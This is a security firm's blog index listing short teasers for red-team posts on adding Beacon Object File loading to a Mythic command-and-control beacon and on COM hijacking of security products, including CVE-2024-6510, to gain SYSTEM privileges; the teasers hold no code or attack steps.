December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 2

November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 2

January 29, 2025 – In this post, we will delve into how we exploited trust in AVG Internet Security (CVE-2024-6510) to gain elevated privileges.
But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 1

January 15, 2025 – In this series of blog posts, we cover how we could exploit five reputable security products to gain SYSTEM privileges with COM hijacking. If you’ve never heard of this, no worries. We introduce all relevant background information, describe our approach to reverse engineering the products’ internals, and explain how we finally exploited the vulnerabilities. We hope to shed some light on this undervalued attack surface.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.
Search
Search